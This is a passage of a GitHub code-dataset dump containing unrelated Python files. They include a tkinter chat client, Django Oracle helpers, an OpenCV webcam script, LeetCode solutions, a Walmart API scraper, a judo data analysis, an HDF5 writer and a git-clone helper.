height=1)\n\t\tself.text_host.insert(INSERT, \"127.0.0.1\")\n\t\tself.text_host.grid(row=0, column=0)\n\n\t\tself.text_port = Text(self.main_gui, width=20, height=1)\n\t\tself.text_port.insert(INSERT, \"9000\")\n\t\tself.text_port.grid(row=0, column=1)\n\n\t\tself.text_user = Text(self.main_gui, width=20, height=1)\n\t\tself.text_user.insert(INSERT, \"username1\")\n\t\tself.text_user.grid(row=1, column=0)\n\n\t\tself.btn_connect = Button(self.main_gui, text=\"connect\", width=20, height=1, command=self.connect_callback)\n\t\tself.btn_connect.grid(row=2, column=0)\n\n\t\tself.text_message = Text(self.main_gui, width=40, height=1)\n\t\tself.text_message.grid(row=3, column=0, columnspan=2, rowspan=2)\n\t\t\n\t\tself.text_receiver = Text(self.main_gui, width=40, height=1)\n\t\tself.text_receiver.grid(row=5, column=0, columnspan=2, rowspan=2)\n\n\t\tself.btn_send = Button(self.main_gui, text=\"send\", width=10, height=1, command=self.send_callback)\n\t\tself.btn_send.grid(row=5, column=2)\n\n\t\tself.text_recv = Text(self.main_gui, width=40, height=20)\n\t\tself.text_recv.grid(row=7, column=0, columnspan=2, rowspan=10)\n\t\t\n\t\tself.btn_disconnect = Button(self.main_gui, text=\"disc\", width=10, height=1, command=self.disconnect_callback)\n\t\tself.btn_disconnect.grid(row=20, column=0)\n\t\t\n\t\tself.wd = WidgetLogger(self.text_recv)\n\t\t\n\t\tself.text_recv.config(state=DISABLED)\n\t\tself.text_host.config(state=NORMAL)\n\t\tself.text_port.config(state=NORMAL)\n\t\tself.text_user.config(state=NORMAL)\n\t\tself.text_message.config(state=DISABLED)\n\t\t\n\tdef connect_callback(self):\n\t\ttry:\n\t\t\thost = self.text_host.get(\"1.0\", END)\n\t\t\tport = self.text_port.get(\"1.0\", END)\n\t\t\tuser = self.text_user.get(\"1.0\", END)\n\t\t\t\n\t\t\tself.client_entity = ClientEntity(user, gui=self)\n\t\t\tself.client_entity.connReq(host, int(port))\n\t\t\tself.client_entity.connResp()\n\t\t\tself.client_entity.greet()\n\t\t\tthreading.Thread(target=self.client_entity.run).start()\n\t\t\t\n\t\t\tself.text_host.config(state=DISABLED)\n\t\t\tself.text_port.config(state=DISABLED)\n\t\t\tself.text_user.config(state=DISABLED)\n\t\t\tself.text_message.config(state=NORMAL)\n\t\t\tself.text_recv.config(state=DISABLED)\n\t\t\tself.text_receiver.config(state=NORMAL)\n\t\t\t\n\t\t\tself.btn_connect.config(state=DISABLED)\n\t\t\tself.btn_disconnect.config(state=NORMAL)\n\t\t\t\n\t\texcept socket.gaierror:\n\t\t\tself.append_text('connection refused')\n\t\texcept ConnectionRefusedError:\n\t\t\tself.append_text('connection refused')\n\t\texcept OSError:\n\t\t\tself.append_text('unreachable host. Please review your connection')\n\t\t\t\n\tdef disconnect_callback(self):\n\t\tself.client_entity.disconnReq()\n\t\tself.btn_connect.config(state=NORMAL)\n\t\tself.text_recv.config(state=DISABLED)\n\t\tself.text_host.config(state=NORMAL)\n\t\tself.text_port.config(state=NORMAL)\n\t\tself.text_user.config(state=NORMAL)\n\t\tself.text_message.config(state=DISABLED)\n\t\t\n\tdef send_callback(self):\n\t\treceiver = self.text_message.get(\"1.0\", END)\n\t\tmessage_str = self.text_receiver.get(\"1.0\", END)\n\t\t\n\t\tself.client_entity.TCPDataSend(receiver, message_str)\n\t\tself.client_entity.TCPDataResp()\n\t\t\n\tdef append_text(self, message):\n\t\t\n\t\tself.text_recv.config(state=NORMAL)\n\t\tself.wd.emit(message)\n\t\tself.text_message.focus_set()\n\t\tself.text_recv.config(state=DISABLED)\n","repo_name":"zaldoarigi/fap-protocol","sub_path":"client/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":4024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25875840645","text":"from django.db import models\nfrom django.db import connection\nimport cx_Oracle\n\n#------------------------Funciones Orden-----------------------\ndef AgregarOrdenCliente(idMesero,idCliente,totalCarritoCliente): \n django_cursor = connection.cursor()\n cursor = django_cursor.connection.cursor()\n v_id = cursor.var(cx_Oracle.NUMBER)\n v_Salida = cursor.var(cx_Oracle.NUMBER)\n cursor.callproc(\"sp_Agregar_OrdenCliente\", [idMesero,idCliente,totalCarritoCliente,1,v_id,v_Salida]) \n return v_Salida.getvalue(),v_id.getvalue()\n\n#------------------------Funciones Detalles Mesa-----------------------\ndef listarMeserosClienteIonic(v_idcliente):\n django_cursor = connection.cursor()\n cursor = django_cursor.connection.cursor()\n out_cursor = django_cursor.connection.cursor()\n\n cursor.callproc(\"sp_listar_MeserosClienteIonic\", [v_idcliente,out_cursor])\n\n lista = []\n datos = \"\"\n for fila in out_cursor:\n datos =crearJsonMeseros (fila[0],fila[1],fila[2],fila[3],fila[4],fila[5],fila[6],fila[7])\n lista.append(datos)\n \n return lista\n\ndef listarOrdenesClientesIonic(v_idcliente):\n django_cursor = connection.cursor()\n cursor = django_cursor.connection.cursor()\n out_cursor = django_cursor.connection.cursor()\n\n cursor.callproc(\"sp_listar_OrdenesClientesIonic\", [v_idcliente,out_cursor])\n\n lista = []\n datos = \"\"\n for fila in out_cursor:\n datos = crearJsonClientes(fila[0],fila[1],fila[2],fila[3],fila[4],fila[5],fila[6],fila[7],fila[8],fila[9])\n lista.append(datos)\n return lista\n\n\ndef crearJsonClientes(ORDECLIENTID,CLIENT_CLIENTID,WAITER_WAITERID,MENUID,QUIANTITY,TOTAL,ORDERCLIENTTOTAL,NAME,STATEORDERSTATE,STATEORDERCLIENT):\n data = {\n \"ORDECLIENTID\" :ORDECLIENTID,\n \"CLIENT_CLIENTID\" :CLIENT_CLIENTID,\n \"WAITER_WAITERID\" :WAITER_WAITERID,\n \"MENUID\" :MENUID,\n \"QUIANTITY\" :QUIANTITY,\n \"TOTAL\" : TOTAL,\n \"ORDERCLIENTTOTAL\" : ORDERCLIENTTOTAL,\n \"NAME\" : NAME,\n \"STATEORDERSTATE\" : STATEORDERSTATE,\n \"STATEORDERCLIENT\" : STATEORDERCLIENT\n }\n return data\n\ndef crearJsonMeseros(WAITERID,CLIENTID,NAMECLIENT,NAMEWAITER,LASTNAMEWAITER,ESTADO_CLIENTE,ESTADO_ORDENCLIENTE,ESTADO_MESERO):\n data = {\n \"WAITERID\" : WAITERID,\n \"CLIENTID\" : CLIENTID,\n \"NAMECLIENT\" : NAMECLIENT,\n \"NAMEWAITER\" : NAMEWAITER,\n \"LASTNAMEWAITER\" : LASTNAMEWAITER,\n \"ESTADO_CLIENTE\" : ESTADO_CLIENTE,\n \"ESTADO_ORDENCLIENTE\" : ESTADO_ORDENCLIENTE,\n \"ESTADO_MESERO\" : ESTADO_MESERO,\n }\n return data\n\n\n\n\ndef pagarOrdenCliente(id_cliente,id_mesa):\n django_cursor = connection.cursor()\n cursor = django_cursor.connection.cursor()\n v_Salida = cursor.var(cx_Oracle.NUMBER)\n\n cursor.callproc(\"sp_pagarOdenProducto\", [id_cliente,id_mesa,v_Salida])\n\n return v_Salida.getvalue()\n\n\n\n\n\n","repo_name":"Alcronx/Portafolio-Ingenieria","sub_path":"Django/src_Restaurant/Modulos/ApiRestaurantApp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41659445102","text":"#import numpy as np\nimport cv2\n\ncap = cv2.VideoCapture(0)\n\nwhile(True):\n ret, frame = cap.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n cv2.imshow('Video', frame)\n cv2.imshow('Frame', gray)\n cv2.imshow('Color', frame[ :, :, 0 ])\n print(frame)\n #print(gray)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n cv2.imwrite(\"B:\\\\VideoPyCharm\\\\frame.jpg\", frame)\n break\ncap.release()\ncv2.destroyAllWindows()","repo_name":"EVGENIIDIULDIN/Temp-program","sub_path":"UZGU_programm/SWSU_new/Cadr_camera/videos.py","file_name":"videos.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36992494295","text":"class Solution:\n def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:\n \"\"\"\n Do not return anything, modify nums1 in-place instead.\n \"\"\"\n i, j = 0, 0\n nums1_copy = nums1[:m]\n nums1[:] = []\n\n while i < m and j < n:\n if nums1_copy[i] < nums2[j]:\n nums1.append(nums1_copy[i])\n i += 1\n else:\n nums1.append(nums2[j])\n j += 1\n\n if i < m:\n nums1[i + j:] = nums1_copy[i:]\n if j < n:\n nums1[i + j:] = nums2[j:]","repo_name":"algorithm006-class02/algorithm006-class02","sub_path":"Week_01/G20200343030638/LeetCode_88(2)_638.py","file_name":"LeetCode_88(2)_638.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"61"} +{"seq_id":"70562908035","text":"import urllib.request\nimport urllib.parse\nimport re\nimport json\n\n\nclass ProductDetail:\n def __init__(self, name: str, imageUrl: str, price: float, quant: float, quantType: str):\n self.name = name\n self.imageUrl = imageUrl\n self.price = price\n self.quant = quant\n self.quantType = quantType\n \n\n def getName(self):\n return self.name\n\n def getImageUrl(self):\n return self.imageUrl\n \n\n def getPrice(self):\n return self.price\n \n\n def getQuant(self):\n #Returns quantity amount like 16\n # Returns quantity amount like 16\n return self.quant\n \n\n def getQuantType(self):\n #Returns quantity type like fl oz\n # Returns quantity type like fl oz\n return self.quantType\n\n\nclass WalmartApi:\n\n def __init__(self):\n self.baseUrl = \"https://grocery.walmart.com/v4/api/products\"\n\n def query_search(self, search_query: str) -> ProductDetail:\n return self.getNameImagePriceQuant(self.getResult(self.buildSearchUrl(search_query)))\n\n def buildSearchUrl(self, search_query: str, store_id: str = 5609) -> str:\n #Temporary store_id\n query_parameters = [\n ('storeId', store_id),\n ('query', search_query),\n ('count', 60),\n ('page', 1),\n ('offset', 0)\n ]\n return self.baseUrl + '/search?' + urllib.parse.urlencode(query_parameters)\n\n def getResult(self, url: str) -> dict:\n response = None\n \n\n try:\n response = urllib.request.urlopen(url)\n json_text = response.read().decode(encoding = 'utf-8')\n \n return json.loads(json_text)\n \n\n finally:\n if response != None:\n response.close()\n\n def getNameImagePriceQuant(self, results: dict) -> ProductDetail:\n\n possibleQuants = [\n ' each',\n ' bunch',\n ' count',\n ' fl oz',\n ' fluid ounce',\n ' oz',\n ' gal',\n ' lb',\n ' bag',\n '-ounce',\n ' pint',\n ' gallon',\n ' ounce',\n ' QT'\n ]\n\n prodResults = results['products'][0]\n\n name = prodResults['basic']['name']\n img = prodResults['basic']['image']['thumbnail']\n price = prodResults['store']['price']['list']\n quant = \"\"\n quantType = \"\"\n\n productUrl = prodResults['basic']['name'].lower()\n\n #Attempts to isolate the quantity and quantity type in the name\n # Attempts to isolate the quantity and quantity type in the name\n for qType in possibleQuants:\n if qType in productUrl:\n if(qType == \"-ounce\"):\n qType = \" oz\"\n productUrl=productUrl.replace(\"-ounce\", \" oz\")\n qLen = len(qType)\n qIndex = productUrl.find(qType)\n quant = productUrl[(qIndex-5):(qIndex+qLen)].strip()\n quantType = qType\n break\n\n #Special case if the quantity is each or bunch\n if(quantType != \" each\" and quantType != \" bunch\"):\n\n match = re.search(r\"\\d\", quant)\n\n if match.start() is not None:\n quant = quant[int(match.start()):]\n\n elif(quantType == \" each\"):\n quant = quant[quant.find(\"each\"):]\n quant = \"1 \" + quant\n\n elif(quantType == \" bunch\"):\n quant = \"4 count\"\n\n quant = quant.split()\n product = ProductDetail(name, img, price, float(quant[0].split('-')[0]), quant[1])\n\n return product \n","repo_name":"costajoshua27/reFresh","sub_path":"APIs/walmartRetrieval.py","file_name":"walmartRetrieval.py","file_ext":"py","file_size_in_byte":3656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23447566881","text":"\r\n# coding: cp932\r\n\r\nlines = iter('''\r\n2\r\n4 2\r\nAAA\r\nAAB\r\nAB\r\nB\r\n5 2\r\nA\r\nB\r\nC\r\nD\r\nE\r\n'''.splitlines(False)[1:])\r\n\r\n\r\nfrom math import sqrt\r\nfrom datetime import datetime\r\nimport sys\r\nclass Out:\r\n\tdef __init__(me, f):\r\n\t\tme.file = f\r\n\tdef write(me, *args):\r\n\t\tsys.stdout.write(*args)\r\n\t\tme.file.write(*args)\r\nout = sys.stdout\r\n#sys.setrecursionlimit(1500)\r\n\r\n#from decimal import Decimal, getcontext\r\n#getcontext().prec = 64\r\n\r\ndate = datetime.now().strftime('%Y%m%d-%H%M%S')\r\n\r\ninfile = 'D-small-attempt0.in'\r\n#infile = 'B-large-practice.in'\r\nlines = iter(open(infile).read().splitlines(False))\r\nout = Out(open(infile[:-3] + (date + '.answer'), 'w'))\r\n\r\nimport time\r\nfrom collections import namedtuple, defaultdict\r\nfrom itertools import count, product, combinations\r\nfrom ctypes import*\r\n\r\nfrom copy import deepcopy\r\n\r\nMAX = float('inf')\r\n\r\nimport sys\r\nsys.setrecursionlimit(1500)\r\n\r\nfrom math import log, cos, sin\r\nimport time\r\nimport inspect\r\n\r\n#print(setup(3, 4))\r\n\r\nMIN = -float('inf')\r\nMAX = float('inf')\r\n\r\ndef gdc(P,Q):\r\n\tr = P%Q\r\n\tif r == 0:\r\n\t\treturn Q\r\n\treturn gdc(Q,r)\r\n\t\r\n\t\r\n\t\t\r\n\r\n#T = Union(100)\r\n#print(T.top(1))\r\n#print(T.tail(1))\r\n#T.combine(1,0)\r\n#print(T.top(1))\r\n#print(T.tail(1))\r\n\r\nie = enumerate\r\nir = range\r\nic = combinations\r\nip = product\r\n\r\nMOD = 1000000007\r\n\r\ndef solve(M,N,S):\r\n\tG = [[0]*M for i in ir(M)]\r\n\tfor i,j in ic(ir(M), 2):\r\n\t\ts = S[i]\r\n\t\ts2= S[j]\r\n\t\tfor n in ir(min(len(s), len(s2))):\r\n\t\t\tif s[n] != s2[n]:break\r\n\t\telse:\r\n\t\t\tn += 1\r\n\t\tG[i][j] = n\r\n\t\tG[j][i] = n\r\n\tfor g in G:print(g)\r\n\t#print(M,N,S)\r\ndef solve(M,N,S):\r\n\tans = 0\r\n\tcnt = 0\r\n\tused = set()\r\n\tfor n in range(N**M):\r\n\t\tD = [0]*M\r\n\t\tfor i in ir(M):\r\n\t\t\tD[i] = n%N\r\n\t\t\tn //= N\r\n\r\n\t\t#temp = ['']*N\r\n\t\t#for i,s in ie(S):\r\n\t\t#\ttemp[D[i]] += s\r\n\t\t#temp.sort()\r\n\t\t#temp = tuple(temp)\r\n\t\t#if temp in used:\r\n\t\t#\tcontinue\r\n\t\t#used.add(temp)\r\n\t\t\r\n\t\t#temp = [0]*N\r\n\t\t#for i in ir(N):\r\n\t\t#\ttemp[D[i]] += 1\r\n\t\t#if 0 in temp: continue\r\n\t\t\r\n\t\tT = [set() for _ in ir(N)]\r\n\t\tfor i,s in ie(S):\r\n\t\t\tt = T[D[i]]\r\n\t\t\tfor j,_ in ie(s):\r\n\t\t\t\tt.add(s[:j+1])\r\n\t\t#print(T)\r\n\t\tc = sum([len(t)+1 if t else 0 for t in T])\r\n\t\tif ans < c:\r\n\t\t\tans = c\r\n\t\t\tcnt = 1\r\n\t\telif ans == c:\r\n\t\t\tcnt += 1\r\n\t\t#ans = max(c,ans)\r\n\treturn '%d %d'%(ans, cnt)\r\n\t\r\n#dll = cdll.LoadLibrary(r'x64\\Release\\c.dll')\r\n#dll.solve.restype = c_int\r\n#dll.solve.argtypes= (c_int,c_int,c_int,CFUNCTYPE(None, c_void_p))\r\n\r\ncaseCnt = int(next(lines))\r\nfor case in range(1, caseCnt+1):\r\n\t(M,N) = map(int, next(lines).split())\r\n\tS = []\r\n\tfor _ in ir(M):\r\n\t\t(s,) = map(str, next(lines).split())\r\n\t\tS += [s]\r\n\tstart = time.time()\r\n\tprint('Case #%d:'%(case), solve(M,N,S), file=out)\r\n\tprint(time.time()-start)\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_151/64.py","file_name":"64.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26496741004","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\n#uvozimo potrebne tabele\ntekmovalci = pd.read_csv('tekmovalci.csv')\njudoisti = pd.read_csv('judoisti.csv')\n\n\n#naredimo funkcije za grafe\ndef drzave(tabela):\n tabela.plot(kind='bar', \n x = 'drzava', xlabel= 'Država', ylabel= 'Število tekmovalcev',\n figsize=(15, 5))\n plt.title('Število tekmovalcev v posamezni državi')\n plt.show()\n \n \n\ndef najboljsi_leto(tabela):\n nova_tabela_leto = pd.DataFrame(columns=[\"leto\", \"ime\", \"število\"])\n for i in range(1960, 2024):\n a = tabela[tabela.datum == i]\n b = a.groupby('ime').size().sort_values(ascending=False).head(1)\n nova_tabela_leto.loc[-1] = [i, b.index[0], b.values[0]]\n nova_tabela_leto.index = nova_tabela_leto.index + 1\n \n nova_tabela_leto['leto, ime'] = nova_tabela_leto['leto'].map(str) + ', ' + nova_tabela_leto['ime']\n nova_tabela_leto.plot(kind='bar', x= 'leto, ime', y='število', xlabel='Leto, tekmovalec', ylabel='Število uspehov', figsize=(15, 5))\n plt.show()\n \n\ndef najboljsi_kategorija(tabela):\n nova_tabela_kategorija = pd.DataFrame(columns=[\"kategorija\", \"ime\", \"število\"])\n kategorije = ['U50','U55','U60','U66','U73','U81','U90','U100','O100','U40','U44','U48','U52','U57','U63','U70','U78','O78']\n for k in kategorije:\n a = tabela[tabela.kategorija == k]\n b = a.groupby('ime').size().sort_values(ascending=False).head(1)\n nova_tabela_kategorija.loc[-1] = [k, b.index[0], b.values[0]]\n nova_tabela_kategorija.index = nova_tabela_kategorija.index + 1\n\n nova_tabela_kategorija['kategorija, ime'] = nova_tabela_kategorija['kategorija'] + ', ' + nova_tabela_kategorija['ime']\n nova_tabela_kategorija.plot(kind='bar', x='kategorija, ime', y= 'število', xlabel='Kategorija, ime', ylabel='Število uspehov', figsize=(10, 4))\n plt.show()\n\ndef pop_tekme(tabela):\n popularne_tekme = tabela.groupby('dogodek').size().sort_values(ascending=False).head(50)\n popularne_tekme.plot(kind= 'pie', x='dogodek', figsize=(10, 12))\n plt.show()\n\ndef tekmovalci_slovenija(tabela):\n a = tabela[tabela.drzava == 'Slovenia'].groupby('datum').size()\n a.plot(kind= 'line', x= 'datum', xlabel= 'Leto', ylabel= 'Število aktivnih judoistov', figsize=(15,5))\n plt.title('Število aktivnih judoistov v sloveniji skozi leta')\n plt.show()\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"BenjaminLevicar/Projektna-naloga","sub_path":"analiza_koda.py","file_name":"analiza_koda.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"sl","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12696244823","text":"import h5py\nfrom pathlib import Path\nfrom datetime import date\n\n\nclass HDF5writer:\n def __init__(self, path_parent: str, filename: str) -> None:\n self.hdffile_path = Path(path_parent, filename + \".hdf5\")\n\n def write_file(self, rock_collection: list, element_list: list, init_parameters_TherCaller, author_name: str = \"unknown author\"):\n \"\"\"_summary_\n\n Args:\n rock_collection (list): _description_\n element_list (list): _description_\n init_parameters_TherCaller (pytheriak.wrapper.TherCaller): _description_\n author_name (str, optional): _description_. Defaults to \"unknown author\".\n \"\"\"\n with h5py.File(self.hdffile_path, \"w\") as hdf_file:\n hdf_file.attrs[\"date\"] = str(date.today())\n hdf_file.attrs[\"author\"] = author_name\n\n hdf_file.attrs[\"theriak_version\"] = init_parameters_TherCaller.theriak_version\n hdf_file.attrs[\"theriak_database\"] = init_parameters_TherCaller.database\n\n hdf_file.attrs[\"global element idx (bulk, phases)\"] = element_list\n\n for rock in rock_collection:\n # create a hdf_group for a Rock()-instance\n rock_group = hdf_file.create_group(str(rock))\n # save THERIN strings, to reproduce the minimisation\n rock_group.attrs[\"THERIN_PT\"] = rock.therin_PT\n rock_group.attrs[\"THERIN_bulk\"] = rock.therin_bulk\n\n # save physical params as attributes\n rock_group.attrs[\"P\"] = int(rock.pressure)\n rock_group.attrs[\"T\"] = int(rock.temperature)\n rock_group.attrs[\"G_system\"] = float(rock.g_system)\n rock_group.attrs[\"G_system_per_mol_of_input\"] = float(rock.g_system_per_mol_of_input)\n # save compositional data (bulk) as dataset, element_list acts as globally valid look-up table for idx --> element\n rock_group.create_dataset(\"bulk_composition_in_mol\", data=rock.bulk_composition_moles)\n rock_group.create_dataset(\"bulk_composition_in_mol_percent\", data=rock.bulk_composition_mol_percent)\n\n # make a sub-group for mineral_assemblage of the Rock()\n mineral_assemblage = rock_group.create_group(\"mineral_assemblage\")\n\n for mineral in rock.mineral_assemblage:\n mineral_group = mineral_assemblage.create_group(mineral.name)\n\n # save physical params as attributes\n mineral_group.attrs[\"n_moles\"] = mineral.n\n mineral_group.attrs[\"volume\"] = mineral.vol\n mineral_group.attrs[\"volume_percent_of_total_solids\"] = mineral.vol_percent\n mineral_group.attrs[\"density\"] = mineral.density\n # save mineral composition as dataset, element_list acts as globally valid look-up table for idx --> element\n mineral_group.create_dataset(\"phase_composition_apfu\", data=mineral.composition_apfu)\n mineral_group.create_dataset(\"phase_composition_moles\", data=mineral.composition_moles)\n\n # make a sub-group for fluid_assemblage of the Rock()\n fluid_assemblage = rock_group.create_group(\"fluid_assemblage\")\n\n for fluid in rock.fluid_assemblage:\n fluid_group = fluid_assemblage.create_group(fluid.name)\n\n # save physical params as attributes\n fluid_group.attrs[\"n_moles\"] = fluid.n\n fluid_group.attrs[\"volume\"] = fluid.vol\n fluid_group.attrs[\"density\"] = fluid.density\n\n fluid_group.create_dataset(\"phase_composition_apfu\", data=fluid.composition_apfu)\n fluid_group.create_dataset(\"phase_composition_moles\", data=fluid.composition_moles)\n\n # save deltaG of all metastable minerals for the Rock()\n metastable_minerals_dataset = rock_group.create_dataset(\"delta_G_meta-stable_minerals\", data=list(rock.mineral_delta_G.values()))\n metastable_minerals_dataset.attrs[\"mineral_names\"] = list(rock.mineral_delta_G.keys())\n metastable_minerals_dataset.attrs[\"unit\"] = \"joules\"\n","repo_name":"Theriak-Domino/pytheriak","sub_path":"src/pytheriak/hdfwriter.py","file_name":"hdfwriter.py","file_ext":"py","file_size_in_byte":4253,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"4886878860","text":"#For D4PG\nBUFFER_SIZE = int(1e6) # replay buffer size\nBATCH_SIZE = 128 # minibatch size\nGAMMA = 0.99 # discount factor\nTAU = 1e-3 # for soft update of target parameters\nLR_ACTOR = 1e-4 # learning rate of the actor, this time for D4PG we choose different lr for actor and critic \nLR_CRITIC = 1e-3 # learning rate of the critic\nWEIGHT_DECAY = 1e-5 #weight decay parameter for adam optimizer\nUPDATE_EVERY = 20\nLEARN_NUM = 10\nEPSILON = 1.0 # explore->exploit noise process added to act step for gaussian noise, works if eps_gauss=True in Agent\nEPSILON_DECAY = 1e-6 #for linear rate of decay \nATOMS=51 #number of atoms of categorical distribution\nROLLOUT_LENGTH=5 #rollout length taken for trajectory \nV_MAX=4 #V_MAX and V_MIN are gonna be the interval within which atoms reside\nV_MIN=0\nHARD_UPDATE=350 #hard update of target networks at each hard_update many steps \nSEED=1\n","repo_name":"mojishoki/DRL-Continuous_Control-P2","sub_path":"D4PG/hyperparameters.py","file_name":"hyperparameters.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18239654131","text":"import csv\n\nfrom django.core.management.base import BaseCommand\nfrom phones.models import Phone\nfrom datetime import datetime\nfrom decimal import Decimal\n\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n pass\n\n def handle(self, *args, **options):\n with open('phones.csv', 'r') as file:\n phones = list(csv.DictReader(file, delimiter=';'))\n\n for phone in phones:\n temp_date = datetime.strptime(phone['release_date'], \"%Y-%m-%d\").date()\n save_str = Phone(\n id=int(phone['id']),\n name=phone['name'],\n price=Decimal(phone['price'].replace(',', '.')),\n image=phone['image'],\n release_date=temp_date,\n lte_exists=bool(phone['lte_exists'])\n )\n save_str.save()\n","repo_name":"akosorukov90/dj_3_new","sub_path":"work_with_database/phones/management/commands/import_phones.py","file_name":"import_phones.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7525115255","text":"import json\nimport re\nimport subprocess\nfrom questionary import prompt\nimport os\n\nfrom goodgit.github import retrieve_github_access_token, get_github_username\n\ndef clone_repo(repo_link=None):\n config_path = os.path.expanduser(\"~/.ssh/goodgit/config.json\")\n \n # Check SSH connection first\n result = subprocess.run([\"ssh\", \"-T\", \"git@github.com\"], capture_output=True, text=True)\n \n if \"You've successfully authenticated\" not in result.stderr:\n print(\"SSH connection to GitHub failed.\")\n \n # Since SSH failed, now check if config file exists\n if not os.path.exists(config_path):\n print(\"\\033[91mConfig file does not exist.\\033[0m\")\n \n # Prompt to create new SSH account\n questions = [\n {\n 'type': 'confirm',\n 'name': 'create_account',\n 'message': 'Do you want to create a new SSH account?',\n 'default': False\n }\n ]\n answers = prompt(questions)\n if answers.get('create_account'):\n # Import and run the function from your SSH module\n from ..ssh.ssh import add_ssh_account\n add_ssh_account()\n return\n else:\n print(\"SSH connection to GitHub succeeded.\")\n \n # If the config file exists, read it\n if os.path.exists(config_path):\n try:\n with open(config_path, \"r\") as f:\n config = json.load(f)\n except Exception as e:\n print(f\"An error occurred while reading the config file: {e}\")\n return\n \n # If repo_link is not provided, ask user for it\n if repo_link is None:\n questions = [\n {\n 'type': 'text',\n 'name': 'repo_link',\n 'message': 'Enter the SSH or HTTPS link of the Git repo you want to clone:',\n }\n ]\n answers = prompt(questions)\n repo_link = answers['repo_link']\n \n # Validate and possibly convert link\n if re.match(r\"git@github\\.com:[\\w-]+/[\\w-]+\\.git\", repo_link):\n print(f\"SSH link provided: {repo_link}\")\n elif re.match(r\"https://github\\.com/[\\w-]+/[\\w-]+\\.git\", repo_link):\n print(f\"HTTPS link provided, converting to SSH: {repo_link}\")\n user_repo = repo_link.replace(\"https://github.com/\", \"\")\n repo_link = f\"git@github.com:{user_repo}\"\n print(repo_link)\n else:\n print(\"Invalid link provided.\")\n return\n \n # Check number of accounts in config\n if os.path.exists(config_path) and len(config[\"accounts\"]) > 1:\n email_options = [acc[\"email\"] for acc in config[\"accounts\"]]\n questions = [\n {\n 'type': 'select',\n 'name': 'email',\n 'message': 'Select the account to clone from:',\n 'choices': email_options,\n }\n ]\n answers = prompt(questions)\n selected_email = answers['email']\n \n access_token = retrieve_github_access_token(selected_email)\n github_username = get_github_username(access_token)\n \n selected_host = next(acc[\"host\"] for acc in config[\"accounts\"] if acc[\"email\"] == selected_email)\n \n # Replace github.com with selected host\n new_repo_link = repo_link.replace(\"github.com\", selected_host)\n print(f\"Cloning from {new_repo_link}\")\n subprocess.run([\"git\", \"clone\", new_repo_link])\n \n repo_folder_name = new_repo_link.split(\"/\")[1].split(\".\")[0]\n \n subprocess.run([\"git\", \"config\", \"--local\", \"user.name\", github_username], cwd=repo_folder_name)\n subprocess.run([\"git\", \"config\", \"--local\", \"user.email\", selected_email], cwd=repo_folder_name)\n\n else:\n print(f\"Cloning from {repo_link}\")\n subprocess.run([\"git\", \"clone\", repo_link])\n\n# For demonstration\nif __name__ == \"__main__\":\n clone_repo()\n\n","repo_name":"brainspoof/goodgit","sub_path":"goodgit/publish/clone.py","file_name":"clone.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"42549506986","text":"class Solution(object):\r\n def reverse(self, x):\r\n \"\"\"\r\n :type x: int\r\n :rtype: int\r\n \"\"\"\r\n is_negative = x < 0\r\n\r\n as_positive = abs(x)\r\n rev_int = int(str(as_positive)[::-1])\r\n\r\n\r\n return -1 * rev_int if is_negative else rev_int\r\n\r\n# r = Solution()\r\n\r\n# print (r.reverse(-213))\r\n","repo_name":"nmaswood/leetcode","sub_path":"todo/7-reverseInteger.py","file_name":"7-reverseInteger.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"70939830273","text":"# Exercise 072: Number in full\n# Make a program that has a tuple completely filled with a number in the full counter, from zero to twenty.\n# Your program must read a number (between 0 and 20) and show it in full.\n\nnumbers_in_full = ('zero', 'one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine', 'ten',\n 'eleven', 'twelve', 'thirteen', 'fourteen', 'fifteen', 'sixteen', 'seventeen', 'eighteen',\n 'nineteen', 'twenty')\nnumber = -1\nwhile number < 0 or number > 20:\n number = int(input('Input here a number between zero and twenty: '))\n\nprint(f'You inputted the number {numbers_in_full[number]}')\n","repo_name":"hugolribeiro/Python3_curso_em_video","sub_path":"World3/exercise072.py","file_name":"exercise072.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11284293412","text":"import math\nimport pandas as pd\nimport Tool\n\nfilename = 'allowed_words.csv'\ndf = pd.read_csv(filename)\n\nword_dic = {}\nfor i in range(26):\n\tword_dic[df[\"letter\"][i]] = df[\"包含单词的个数\"][i]\nprint(word_dic)\n\nfilepath = 'data/test_words.txt'\n\nword_datas = []\n\ncount = 